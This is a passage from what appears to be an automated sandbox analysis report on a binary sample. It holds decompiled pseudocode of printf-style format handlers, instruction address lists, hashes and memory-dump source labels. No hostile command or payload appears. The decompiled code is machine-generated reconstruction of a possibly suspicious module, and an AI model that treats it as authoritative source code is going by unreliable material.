								_push(0x2d);
								goto L44;
							}
							L11:
							goto L72;
						}
						_t95 = _t60;
						__eflags = _t95;
						if(__eflags == 0) {
							L29:
							_push(0);
							_push(0xa);
							L30:
							_t61 = E6E1ABD6F(_t138, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L30;
					}
					if(__eflags == 0) {
						_t61 = E6E1AC15A(__ecx);
						goto L10;
					}
					__eflags = _t59 - 0x65;
					if(_t59 < 0x65) {
						goto L11;
					}
					__eflags = _t59 - 0x67;
					if(_t59 <= 0x67) {
						L31:
						_t61 = E6E1AB4CE(_t138);
						goto L10;
					}
					__eflags = _t59 - 0x69;
					if(_t59 == 0x69) {
						L28:
						_t3 = _t138 + 0x20;
						 *_t3 =  *(_t138 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L29;
					}
					__eflags = _t59 - 0x6e;
					if(_t59 == 0x6e) {
						_t61 = E6E1ABFFF(__ecx, _t128);
						goto L10;
					}
					__eflags = _t59 - 0x6f;
					if(_t59 != 0x6f) {
						goto L11;
					}
					_t61 = E6E1AC0F3(__ecx);
					goto L10;
				}
				if(_t142 == 0) {
					goto L28;
				}
				_t143 = _t59 - _t110;
				if(_t143 > 0) {
					_t97 = _t59 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t61 = E6E1AAFC7(0, __ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L31;
					}
					__eflags = _t98 != 0;
					if(_t98 != 0) {
						goto L11;
					}
					L17:
					_t61 = E6E1AB863(_t138, _t128, 0);
					goto L10;
				}
				if(_t143 == 0) {
					_push(1);
					goto L13;
				}
				if(_t59 == _t128) {
					goto L31;
				}
				if(_t59 == 0x43) {
					goto L17;
				}
				if(_t59 <= 0x44) {
					goto L11;
				}
				if(_t59 <= 0x47) {
					goto L31;
				}
				if(_t59 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1aaa55
0x6e1aaa5d
0x6e1aaa64
0x6e1aaa69
0x6e1aaa6f
0x6e1aaa72
0x6e1aaa76
0x6e1aaa77
0x6e1aaa7a
0x6e1aaae7
0x6e1aaaea
0x6e1aab41
0x6e1aab41
0x6e1aab44
0x6e1aaaa8
0x6e1aaaaa
0x6e1aaaaf
0x6e1aaab1
0x6e1aab61
0x6e1aab66
0x6e1aab68
0x6e1aacb9
0x6e1aacbb
0x6e1aacc8
0x6e1aacc8
0x6e1aab6e
0x6e1aab71
0x00000000
0x00000000
0x6e1aab77
0x6e1aab79
0x6e1aab7c
0x6e1aab82
0x6e1aab86
0x6e1aab89
0x6e1aab8c
0x6e1aab91
0x6e1aab92
0x6e1aab94
0x6e1aabc6
0x6e1aabc6
0x6e1aabcc
0x6e1aabcd
0x6e1aabd0
0x6e1aabda
0x6e1aabdc
0x6e1aabdf
0x6e1aabe1
0x6e1aabe7
0x6e1aabe7
0x6e1aabe7
0x6e1aabe9
0x6e1aabe9
0x6e1aabec
0x6e1aabfa
0x6e1aabfa
0x6e1aabfc
0x6e1aabfc
0x6e1aac03
0x6e1aac05
0x6e1aac0b
0x6e1aac10
0x6e1aac15
0x6e1aac16
0x6e1aac19
0x6e1aac23
0x6e1aac23
0x6e1aac25
0x6e1aac25
0x6e1aac2a
0x6e1aac2a
0x6e1aac2d
0x6e1aac30
0x6e1aac33
0x6e1aac39
0x6e1aac3f
0x6e1aac41
0x6e1aac45
0x6e1aac4c
0x6e1aac51
0x6e1aac54
0x6e1aac54
0x6e1aac5a
0x6e1aac66
0x6e1aac6b
0x6e1aac70
0x6e1aac73
0x6e1aac75
0x6e1aac77
0x6e1aac7a
0x6e1aac7d
0x6e1aac88
0x6e1aac8d
0x6e1aac8d
0x6e1aac7d
0x6e1aac94
0x6e1aac99
0x6e1aac9c
0x6e1aac9f
0x6e1aaca4
0x6e1aaca7
0x6e1aaca9
0x6e1aacb0
0x6e1aacb5
0x6e1aaca9
0x00000000
0x6e1aacb8
0x6e1aac1d
0x6e1aac1e
0x6e1aac21
0x00000000
0x00000000
0x00000000
0x6e1aac21
0x6e1aac07
0x6e1aac09
0x00000000
0x00000000
0x00000000
0x6e1aac09
0x6e1aabf0
0x6e1aabf1
0x6e1aabf4
0x00000000
0x00000000
0x6e1aabf6
0x00000000
0x6e1aabf6
0x6e1aabe3
0x00000000
0x6e1aabe3
0x6e1aabd4
0x6e1aabd5
0x6e1aabd8
0x00000000
0x00000000
0x00000000
0x6e1aabd8
0x6e1aab98
0x6e1aab9b
0x6e1aab9d
0x6e1aaba3
0x6e1aaba5
0x6e1aabb7
0x6e1aabb9
0x6e1aabbb
0x6e1aabbd
0x6e1aabc1
0x6e1aabc3
0x6e1aabc3
0x00000000
0x6e1aabbb
0x6e1aaba7
0x6e1aaba9
0x6e1aaba9
0x6e1aabaa
0x6e1aabac
0x6e1aabb0
0x00000000
0x6e1aabb0
0x6e1aab9f
0x00000000
0x6e1aab9f
0x6e1aaab7
0x00000000
0x6e1aaab7
0x6e1aab4b
0x6e1aab4b
0x6e1aab4e
0x6e1aab1d
0x6e1aab1d
0x6e1aab1e
0x6e1aab20
0x6e1aab22
0x00000000
0x6e1aab22
0x6e1aab50
0x6e1aab53
0x00000000
0x00000000
0x6e1aab59
0x6e1aaac0
0x6e1aaac0
0x00000000
0x6e1aaac0
0x6e1aaaec
0x6e1aab37
0x00000000
0x6e1aab37
0x6e1aaaee
0x6e1aaaf1
0x00000000
0x00000000
0x6e1aaaf3
0x6e1aaaf6
0x6e1aab29
0x6e1aab2b
0x00000000
0x6e1aab2b
0x6e1aaaf8
0x6e1aaafb
0x6e1aab19
0x6e1aab19
0x6e1aab19
0x6e1aab19
0x00000000
0x6e1aab19
0x6e1aaafd
0x6e1aab00
0x6e1aab12
0x00000000
0x6e1aab12
0x6e1aab02
0x6e1aab05
0x00000000
0x00000000
0x6e1aab09
0x00000000
0x6e1aab09
0x6e1aaa7c
0x00000000
0x00000000
0x6e1aaa82
0x6e1aaa84
0x6e1aaac4
0x6e1aaac4
0x6e1aaac7
0x6e1aaae0
0x00000000
0x6e1aaae0
0x6e1aaac9
0x6e1aaac9
0x6e1aaacc
0x00000000
0x00000000
0x6e1aaacf
0x6e1aaad2
0x00000000
0x00000000
0x6e1aaad4
0x6e1aaad7
0x00000000
0x6e1aaad7
0x6e1aaa86
0x6e1aaabe
0x00000000
0x6e1aaabe
0x6e1aaa8a
0x00000000
0x00000000
0x6e1aaa93
0x00000000
0x00000000
0x6e1aaa98
0x00000000
0x00000000
0x6e1aaa9d
0x00000000
0x00000000
0x6e1aaaa6
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AABFC

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7de2f6def738c47d3cce03806dcacbbdf3969f7cb4e32777104c1cbe8445abc1
Instruction ID: 2b43ce8883be23f96e9ae08668e7be2e2c4e0007dccb2e9ba969c2b3de96fbaa
Opcode Fuzzy Hash: 7de2f6def738c47d3cce03806dcacbbdf3969f7cb4e32777104c1cbe8445abc1
Instruction Fuzzy Hash: 4061267C6407065BEB54CEEC8970BBE73EABB61344F60091ED7429B284D7629DC5B341

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA7F0, Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E1AA7F0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				short _v16;
				signed int _v20;
				short _v24;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed char _t65;
				signed char _t67;
				signed int _t68;
				short _t70;
				void* _t71;
				signed char _t77;
				signed char _t80;
				void* _t85;
				void* _t86;
				signed char _t88;
				signed char _t90;
				short _t91;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				unsigned int _t102;
				signed int _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				signed int _t113;
				unsigned int _t115;
				signed int* _t117;
				signed char _t118;
				void* _t126;
				signed int _t129;
				void* _t130;
				short _t131;
				short _t132;
				void* _t133;
				intOrPtr* _t136;
				signed int _t137;
				void* _t138;
				void* _t140;
				void* _t141;

				_t130 = __edi;
				_t57 =  *0x6e212008; // 0xa172442e
				_v8 = _t57 ^ _t137;
				_t136 = __ecx;
				_t126 = 0x41;
				_t59 =  *(__ecx + 0x32) & 0x0000ffff;
				_t109 = 0x58;
				_t140 = _t59 - 0x64;
				if(_t140 > 0) {
					__eflags = _t59 - 0x70;
					if(__eflags > 0) {
						_t60 = _t59 - 0x73;
						__eflags = _t60;
						if(_t60 == 0) {
							L9:
							_t61 = E6E1AC261(_t136);
							L10:
							if(_t61 != 0) {
								__eflags =  *(_t136 + 0x30);
								if( *(_t136 + 0x30) != 0) {
									L70:
									L71:
									return E6E199EE7(_v8 ^ _t137);
								}
								_t113 = 0;
								_v16 = 0;
								_v12 = 0;
								_t102 =  *(_t136 + 0x20);
								_push(_t130);
								_v20 = 0;
								_t65 = _t102 >> 4;
								_t131 = 0x20;
								__eflags = 1 & _t65;
								if((1 & _t65) == 0) {
									L46:
									_t129 =  *(_t136 + 0x32) & 0x0000ffff;
									_t132 = 0x78;
									__eflags = _t129 - _t132;
									if(_t129 == _t132) {
										L48:
										_t67 = _t102 >> 5;
										__eflags = _t67 & 0x00000001;
										if((_t67 & 0x00000001) == 0) {
											L50:
											_t103 = 0;
											__eflags = 0;
											L51:
											__eflags = _t129 - 0x61;
											if(_t129 == 0x61) {
												L54:
												_t68 = 1;
												L55:
												_v24 = 0x30;
												__eflags = _t103;
												if(_t103 != 0) {
													L57:
													 *((short*)(_t137 + _t113 * 2 - 0xc)) = _v24;
													_t70 = 0x58;
													__eflags = _t129 - _t70;
													if(_t129 == _t70) {
														L59:
														_t132 = _t70;
														L60:
														 *((short*)(_t137 + _t113 * 2 - 0xa)) = _t132;
														_t113 = _t113 + 2;
														__eflags = _t113;
														_v20 = _t113;
														L61:
														_t71 = _t136 + 0x18;
														_t133 = _t136 + 0x448;
														_t106 =  *((intOrPtr*)(_t136 + 0x24)) -  *((intOrPtr*)(_t136 + 0x38)) - _t113;
														__eflags =  *(_t136 + 0x20) & 0x0000000c;
														if(( *(_t136 + 0x20) & 0x0000000c) == 0) {
															E6E1A6EF4(_t133, 0x20, _t106, _t71);
															_t113 = _v20;
															_t138 = _t138 + 0x10;
														}
														_push(_t136 + 0xc);
														E6E1AD015(_t133,  &_v16, _t113, _t136 + 0x18);
														_t115 =  *(_t136 + 0x20);
														_t77 = _t115 >> 3;
														__eflags = _t77 & 0x00000001;
														if((_t77 & 0x00000001) != 0) {
															_t118 = _t115 >> 2;
															__eflags = _t118 & 0x00000001;
															if((_t118 & 0x00000001) == 0) {
																E6E1A6EF4(_t133, _v24, _t106, _t136 + 0x18);
																_t138 = _t138 + 0x10;
															}
														}
														E6E1ACEC3(_t136, _t129, 0);
														_t117 = _t136 + 0x18;
														__eflags =  *_t117;
														if( *_t117 >= 0) {
															_t80 =  *(_t136 + 0x20) >> 2;
															__eflags = _t80 & 0x00000001;
															if((_t80 & 0x00000001) != 0) {
																E6E1A6EF4(_t133, 0x20, _t106, _t117);
															}
														}
														goto L70;
													}
													_t107 = 0x41;
													__eflags = _t129 - _t107;
													if(_t129 != _t107) {
														goto L60;
													}
													goto L59;
												}
												__eflags = _t68;
												if(_t68 == 0) {
													goto L61;
												}
												goto L57;
											}
											_t85 = 0x41;
											__eflags = _t129 - _t85;
											if(_t129 == _t85) {
												goto L54;
											}
											_t68 = 0;
											goto L55;
										}
										_t103 = 1;
										goto L51;
									}
									_t86 = 0x58;
									__eflags = _t129 - _t86;
									if(_t129 != _t86) {
										goto L50;
									}
									goto L48;
								}
								_t88 = _t102 >> 6;
								__eflags = 1 & _t88;
								if((1 & _t88) == 0) {
									__eflags = 1 & _t102;
									if((1 & _t102) == 0) {
										_t90 = _t102 >> 1;
										__eflags = 1 & _t90;
										if((1 & _t90) != 0) {
											_v16 = _t131;
											_t113 = 1;
											_v20 = 1;
										}
										goto L46;
									}
									_push(0x2b);
									L43:
									_pop(_t91);
									_t113 = 1;
									_v16 = _t91;
									_v20 = 1;
									goto L46;
								}
								_push(0x2d);
								goto L43;
							}
							L11:
							goto L71;
						}
						_t94 = _t60;
						__eflags = _t94;
						if(__eflags == 0) {
							L29:
							_push(0);
							_push(0xa);
							L30:
							_t61 = E6E1ABC1A(_t136, __eflags);
							goto L10;
						}
						__eflags = _t94 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L30;
					}
					if(__eflags == 0) {
						_t61 = E6E1AC142(__ecx);
						goto L10;
					}
					__eflags = _t59 - 0x65;
					if(_t59 < 0x65) {
						goto L11;
					}
					__eflags = _t59 - 0x67;
					if(_t59 <= 0x67) {
						L31:
						_t61 = E6E1AB369(_t136);
						goto L10;
					}
					__eflags = _t59 - 0x69;
					if(_t59 == 0x69) {
						L28:
						_t3 = _t136 + 0x20;
						 *_t3 =  *(_t136 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L29;
					}
					__eflags = _t59 - 0x6e;
					if(_t59 == 0x6e) {
						_t61 = E6E1ABEF4(__ecx, _t126);
						goto L10;
					}
					__eflags = _t59 - 0x6f;
					if(_t59 != 0x6f) {
						goto L11;
					}
					_t61 = E6E1AC0D4(__ecx);
					goto L10;
				}
				if(_t140 == 0) {
					goto L28;
				}
				_t141 = _t59 - _t109;
				if(_t141 > 0) {
					_t96 = _t59 - 0x5a;
					__eflags = _t96;
					if(_t96 == 0) {
						_t61 = E6E1AAF6D(__ecx);
						goto L10;
					}
					_t97 = _t96 - 7;
					__eflags = _t97;
					if(_t97 == 0) {
						goto L31;
					}
					__eflags = _t97;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t61 = E6E1AB7CD(_t136, _t126, __eflags, 0);
					goto L10;
				}
				if(_t141 == 0) {
					_push(1);
					goto L13;
				}
				if(_t59 == _t126) {
					goto L31;
				}
				if(_t59 == 0x43) {
					goto L17;
				}
				if(_t59 <= 0x44) {
					goto L11;
				}
				if(_t59 <= 0x47) {
					goto L31;
				}
				if(_t59 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1aa7f0
0x6e1aa7f8
0x6e1aa7ff
0x6e1aa804
0x6e1aa80a
0x6e1aa80d
0x6e1aa811
0x6e1aa812
0x6e1aa815
0x6e1aa882
0x6e1aa885
0x6e1aa8dc
0x6e1aa8dc
0x6e1aa8df
0x6e1aa843
0x6e1aa845
0x6e1aa84a
0x6e1aa84c
0x6e1aa8fa
0x6e1aa8fd
0x6e1aaa45
0x6e1aaa47
0x6e1aaa54
0x6e1aaa54
0x6e1aa903
0x6e1aa905
0x6e1aa908
0x6e1aa90e
0x6e1aa912
0x6e1aa915
0x6e1aa918
0x6e1aa91d
0x6e1aa91e
0x6e1aa920
0x6e1aa952
0x6e1aa952
0x6e1aa958
0x6e1aa959
0x6e1aa95c
0x6e1aa966
0x6e1aa968
0x6e1aa96b
0x6e1aa96d
0x6e1aa973
0x6e1aa973
0x6e1aa973
0x6e1aa975
0x6e1aa975
0x6e1aa978
0x6e1aa986
0x6e1aa986
0x6e1aa988
0x6e1aa988
0x6e1aa98f
0x6e1aa991
0x6e1aa997
0x6e1aa99c
0x6e1aa9a1
0x6e1aa9a2
0x6e1aa9a5
0x6e1aa9af
0x6e1aa9af
0x6e1aa9b1
0x6e1aa9b1
0x6e1aa9b6
0x6e1aa9b6
0x6e1aa9b9
0x6e1aa9bc
0x6e1aa9bf
0x6e1aa9c5
0x6e1aa9cb
0x6e1aa9cd
0x6e1aa9d1
0x6e1aa9d8
0x6e1aa9dd
0x6e1aa9e0
0x6e1aa9e0
0x6e1aa9e6
0x6e1aa9f2
0x6e1aa9f7
0x6e1aa9fc
0x6e1aa9ff
0x6e1aaa01
0x6e1aaa03
0x6e1aaa06
0x6e1aaa09
0x6e1aaa14
0x6e1aaa19
0x6e1aaa19
0x6e1aaa09
0x6e1aaa20
0x6e1aaa25
0x6e1aaa28
0x6e1aaa2b
0x6e1aaa30
0x6e1aaa33
0x6e1aaa35
0x6e1aaa3c
0x6e1aaa41
0x6e1aaa35
0x00000000
0x6e1aaa44
0x6e1aa9a9
0x6e1aa9aa
0x6e1aa9ad
0x00000000
0x00000000
0x00000000
0x6e1aa9ad
0x6e1aa993
0x6e1aa995
0x00000000
0x00000000
0x00000000
0x6e1aa995
0x6e1aa97c
0x6e1aa97d
0x6e1aa980
0x00000000
0x00000000
0x6e1aa982
0x00000000
0x6e1aa982
0x6e1aa96f
0x00000000
0x6e1aa96f
0x6e1aa960
0x6e1aa961
0x6e1aa964
0x00000000
0x00000000
0x00000000
0x6e1aa964
0x6e1aa924
0x6e1aa927
0x6e1aa929
0x6e1aa92f
0x6e1aa931
0x6e1aa943
0x6e1aa945
0x6e1aa947
0x6e1aa949
0x6e1aa94d
0x6e1aa94f
0x6e1aa94f
0x00000000
0x6e1aa947
0x6e1aa933
0x6e1aa935
0x6e1aa935
0x6e1aa936
0x6e1aa938
0x6e1aa93c
0x00000000
0x6e1aa93c
0x6e1aa92b
0x00000000
0x6e1aa92b
0x6e1aa852
0x00000000
0x6e1aa852
0x6e1aa8e6
0x6e1aa8e6
0x6e1aa8e9
0x6e1aa8b8
0x6e1aa8b8
0x6e1aa8b9
0x6e1aa8bb
0x6e1aa8bd
0x00000000
0x6e1aa8bd
0x6e1aa8eb
0x6e1aa8ee
0x00000000
0x00000000
0x6e1aa8f4
0x6e1aa85b
0x6e1aa85b
0x00000000
0x6e1aa85b
0x6e1aa887
0x6e1aa8d2
0x00000000
0x6e1aa8d2
0x6e1aa889
0x6e1aa88c
0x00000000
0x00000000
0x6e1aa88e
0x6e1aa891
0x6e1aa8c4
0x6e1aa8c6
0x00000000
0x6e1aa8c6
0x6e1aa893
0x6e1aa896
0x6e1aa8b4
0x6e1aa8b4
0x6e1aa8b4
0x6e1aa8b4
0x00000000
0x6e1aa8b4
0x6e1aa898
0x6e1aa89b
0x6e1aa8ad
0x00000000
0x6e1aa8ad
0x6e1aa89d
0x6e1aa8a0
0x00000000
0x00000000
0x6e1aa8a4
0x00000000
0x6e1aa8a4
0x6e1aa817
0x00000000
0x00000000
0x6e1aa81d
0x6e1aa81f
0x6e1aa85f
0x6e1aa85f
0x6e1aa862
0x6e1aa87b
0x00000000
0x6e1aa87b
0x6e1aa864
0x6e1aa864
0x6e1aa867
0x00000000
0x00000000
0x6e1aa86a
0x6e1aa86d
0x00000000
0x00000000
0x6e1aa86f
0x6e1aa872
0x00000000
0x6e1aa872
0x6e1aa821
0x6e1aa859
0x00000000
0x6e1aa859
0x6e1aa825
0x00000000
0x00000000
0x6e1aa82e
0x00000000
0x00000000
0x6e1aa833
0x00000000
0x00000000
0x6e1aa838
0x00000000
0x00000000
0x6e1aa841
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AA988

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f89bae818a6d33d6ec05200bf03f6acbb0e9192f4f40a830e3eb6711f8fa031f
Instruction ID: 4fa3f78af76637285c5a3143d8d54f284b10d334a3cf1d295b13992afabaf531
Opcode Fuzzy Hash: f89bae818a6d33d6ec05200bf03f6acbb0e9192f4f40a830e3eb6711f8fa031f
Instruction Fuzzy Hash: 78616A386403065BDB64CEEC84A0BBEB3A9AF61704F20482DD7A2DB2C5D7659DC7B341

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA317, Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E6E1AA317(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				short _v16;
				signed int _v20;
				short _v24;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed char _t65;
				signed char _t67;
				signed int _t68;
				short _t70;
				void* _t71;
				signed char _t77;
				signed char _t80;
				void* _t85;
				void* _t86;
				signed char _t88;
				signed char _t90;
				short _t91;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				unsigned int _t102;
				signed int _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				signed int _t113;
				unsigned int _t115;
				signed int* _t117;
				signed char _t118;
				void* _t126;
				signed int _t129;
				void* _t130;
				short _t131;
				short _t132;
				void* _t133;
				intOrPtr* _t136;
				signed int _t137;
				void* _t138;
				void* _t140;
				void* _t141;

				_t130 = __edi;
				_t57 =  *0x6e212008; // 0xa172442e
				_v8 = _t57 ^ _t137;
				_t136 = __ecx;
				_t126 = 0x41;
				_t59 =  *(__ecx + 0x32) & 0x0000ffff;
				_t109 = 0x58;
				_t140 = _t59 - 0x64;
				if(_t140 > 0) {
					__eflags = _t59 - 0x70;
					if(__eflags > 0) {
						_t60 = _t59 - 0x73;
						__eflags = _t60;
						if(_t60 == 0) {
							L9:
							_t61 = E6E1AC261(_t136);
							L10:
							if(_t61 != 0) {
								__eflags =  *(_t136 + 0x30);
								if( *(_t136 + 0x30) != 0) {
									L70:
									L71:
									return E6E199EE7(_v8 ^ _t137);
								}
								_t113 = 0;
								_v16 = 0;
								_v12 = 0;
								_t102 =  *(_t136 + 0x20);
								_push(_t130);
								_v20 = 0;
								_t65 = _t102 >> 4;
								_t131 = 0x20;
								__eflags = 1 & _t65;
								if((1 & _t65) == 0) {
									L46:
									_t129 =  *(_t136 + 0x32) & 0x0000ffff;
									_t132 = 0x78;
									__eflags = _t129 - _t132;
									if(_t129 == _t132) {
										L48:
										_t67 = _t102 >> 5;
										__eflags = _t67 & 0x00000001;
										if((_t67 & 0x00000001) == 0) {
											L50:
											_t103 = 0;
											__eflags = 0;
											L51:
											__eflags = _t129 - 0x61;
											if(_t129 == 0x61) {
												L54:
												_t68 = 1;
												L55:
												_v24 = 0x30;
												__eflags = _t103;
												if(_t103 != 0) {
													L57:
													 *((short*)(_t137 + _t113 * 2 - 0xc)) = _v24;
													_t70 = 0x58;
													__eflags = _t129 - _t70;
													if(_t129 == _t70) {
														L59:
														_t132 = _t70;
														L60:
														 *((short*)(_t137 + _t113 * 2 - 0xa)) = _t132;
														_t113 = _t113 + 2;
														__eflags = _t113;
														_v20 = _t113;
														L61:
														_t71 = _t136 + 0x18;
														_t133 = _t136 + 0x448;
														_t106 =  *((intOrPtr*)(_t136 + 0x24)) -  *((intOrPtr*)(_t136 + 0x38)) - _t113;
														__eflags =  *(_t136 + 0x20) & 0x0000000c;
														if(( *(_t136 + 0x20) & 0x0000000c) == 0) {
															E6E1A6E88(_t133, 0x20, _t106, _t71);
															_t113 = _v20;
															_t138 = _t138 + 0x10;
														}
														_push(_t136 + 0xc);
														E6E1ACF82(_t133,  &_v16, _t113, _t136 + 0x18);
														_t115 =  *(_t136 + 0x20);
														_t77 = _t115 >> 3;
														__eflags = _t77 & 0x00000001;
														if((_t77 & 0x00000001) != 0) {
															_t118 = _t115 >> 2;
															__eflags = _t118 & 0x00000001;
															if((_t118 & 0x00000001) == 0) {
																E6E1A6E88(_t133, _v24, _t106, _t136 + 0x18);
																_t138 = _t138 + 0x10;
															}
														}
														E6E1ACE30(_t136, _t129, 0);
														_t117 = _t136 + 0x18;
														__eflags =  *_t117;
														if( *_t117 >= 0) {
															_t80 =  *(_t136 + 0x20) >> 2;
															__eflags = _t80 & 0x00000001;
															if((_t80 & 0x00000001) != 0) {
																E6E1A6E88(_t133, 0x20, _t106, _t117);
															}
														}
														goto L70;
													}
													_t107 = 0x41;
													__eflags = _t129 - _t107;
													if(_t129 != _t107) {
														goto L60;
													}
													goto L59;
												}
												__eflags = _t68;
												if(_t68 == 0) {
													goto L61;
												}
												goto L57;
											}
											_t85 = 0x41;
											__eflags = _t129 - _t85;
											if(_t129 == _t85) {
												goto L54;
											}
											_t68 = 0;
											goto L55;
										}
										_t103 = 1;
										goto L51;
									}
									_t86 = 0x58;
									__eflags = _t129 - _t86;
									if(_t129 != _t86) {
										goto L50;
									}
									goto L48;
								}
								_t88 = _t102 >> 6;
								__eflags = 1 & _t88;
								if((1 & _t88) == 0) {
									__eflags = 1 & _t102;
									if((1 & _t102) == 0) {
										_t90 = _t102 >> 1;
										__eflags = 1 & _t90;
										if((1 & _t90) != 0) {
											_v16 = _t131;
											_t113 = 1;
											_v20 = 1;
										}
										goto L46;
									}
									_push(0x2b);
									L43:
									_pop(_t91);
									_t113 = 1;
									_v16 = _t91;
									_v20 = 1;
									goto L46;
								}
								_push(0x2d);
								goto L43;
							}
							L11:
							goto L71;
						}
						_t94 = _t60;
						__eflags = _t94;
						if(__eflags == 0) {
							L29:
							_push(0);
							_push(0xa);
							L30:
							_t61 = E6E1ABC1A(_t136, __eflags);
							goto L10;
						}
						__eflags = _t94 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L30;
					}
					if(__eflags == 0) {
						_t61 = E6E1AC142(__ecx);
						goto L10;
					}
					__eflags = _t59 - 0x65;
					if(_t59 < 0x65) {
						goto L11;
					}
					__eflags = _t59 - 0x67;
					if(_t59 <= 0x67) {
						L31:
						_t61 = E6E1AB369(_t136);
						goto L10;
					}
					__eflags = _t59 - 0x69;
					if(_t59 == 0x69) {
						L28:
						_t3 = _t136 + 0x20;
						 *_t3 =  *(_t136 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L29;
					}
					__eflags = _t59 - 0x6e;
					if(_t59 == 0x6e) {
						_t61 = E6E1ABEF4(__ecx, _t126);
						goto L10;
					}
					__eflags = _t59 - 0x6f;
					if(_t59 != 0x6f) {
						goto L11;
					}
					_t61 = E6E1AC0D4(__ecx);
					goto L10;
				}
				if(_t140 == 0) {
					goto L28;
				}
				_t141 = _t59 - _t109;
				if(_t141 > 0) {
					_t96 = _t59 - 0x5a;
					__eflags = _t96;
					if(_t96 == 0) {
						_t61 = E6E1AAF6D(__ecx);
						goto L10;
					}
					_t97 = _t96 - 7;
					__eflags = _t97;
					if(_t97 == 0) {
						goto L31;
					}
					__eflags = _t97;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t61 = E6E1AB7CD(_t136, _t126, __eflags, 0);
					goto L10;
				}
				if(_t141 == 0) {
					_push(1);
					goto L13;
				}
				if(_t59 == _t126) {
					goto L31;
				}
				if(_t59 == 0x43) {
					goto L17;
				}
				if(_t59 <= 0x44) {
					goto L11;
				}
				if(_t59 <= 0x47) {
					goto L31;
				}
				if(_t59 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1aa317
0x6e1aa31f
0x6e1aa326
0x6e1aa32b
0x6e1aa331
0x6e1aa334
0x6e1aa338
0x6e1aa339
0x6e1aa33c
0x6e1aa3a9
0x6e1aa3ac
0x6e1aa403
0x6e1aa403
0x6e1aa406
0x6e1aa36a
0x6e1aa36c
0x6e1aa371
0x6e1aa373
0x6e1aa421
0x6e1aa424
0x6e1aa56c
0x6e1aa56e
0x6e1aa57b
0x6e1aa57b
0x6e1aa42a
0x6e1aa42c
0x6e1aa42f
0x6e1aa435
0x6e1aa439
0x6e1aa43c
0x6e1aa43f
0x6e1aa444
0x6e1aa445
0x6e1aa447
0x6e1aa479
0x6e1aa479
0x6e1aa47f
0x6e1aa480
0x6e1aa483
0x6e1aa48d
0x6e1aa48f
0x6e1aa492
0x6e1aa494
0x6e1aa49a
0x6e1aa49a
0x6e1aa49a
0x6e1aa49c
0x6e1aa49c
0x6e1aa49f
0x6e1aa4ad
0x6e1aa4ad
0x6e1aa4af
0x6e1aa4af
0x6e1aa4b6
0x6e1aa4b8
0x6e1aa4be
0x6e1aa4c3
0x6e1aa4c8
0x6e1aa4c9
0x6e1aa4cc
0x6e1aa4d6
0x6e1aa4d6
0x6e1aa4d8
0x6e1aa4d8
0x6e1aa4dd
0x6e1aa4dd
0x6e1aa4e0
0x6e1aa4e3
0x6e1aa4e6
0x6e1aa4ec
0x6e1aa4f2
0x6e1aa4f4
0x6e1aa4f8
0x6e1aa4ff
0x6e1aa504
0x6e1aa507
0x6e1aa507
0x6e1aa50d
0x6e1aa519
0x6e1aa51e
0x6e1aa523
0x6e1aa526
0x6e1aa528
0x6e1aa52a
0x6e1aa52d
0x6e1aa530
0x6e1aa53b
0x6e1aa540
0x6e1aa540
0x6e1aa530
0x6e1aa547
0x6e1aa54c
0x6e1aa54f
0x6e1aa552
0x6e1aa557
0x6e1aa55a
0x6e1aa55c
0x6e1aa563
0x6e1aa568
0x6e1aa55c
0x00000000
0x6e1aa56b
0x6e1aa4d0
0x6e1aa4d1
0x6e1aa4d4
0x00000000
0x00000000
0x00000000
0x6e1aa4d4
0x6e1aa4ba
0x6e1aa4bc
0x00000000
0x00000000
0x00000000
0x6e1aa4bc
0x6e1aa4a3
